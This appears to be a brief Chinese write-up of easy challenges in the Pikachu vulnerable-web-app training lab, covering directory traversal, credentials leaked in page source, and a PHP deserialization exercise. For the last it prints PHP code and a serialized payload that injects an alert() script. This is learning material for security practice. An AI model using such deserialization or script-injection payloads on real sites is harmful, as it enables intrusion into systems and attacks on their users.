Pikachu-一些简单的题
目录遍历漏洞
这题直接查找你想要的核心文件,比较简单

敏感信息泄露
查看网页源代码发现有账号和密码,直接登录


PHP反序列化
根据概述提示得知
class S{
public $test="pikachu";
}
那么我们开始构建序列化
class S{
public $test="<script>alert(11111)</script>";
}
$t = new S;
echo serialize($t);
得到payload
O:1:"S":1:{s:4:"test";s:29:"<script>alert(11111)</script>";}



浙公网安备 33010602011771号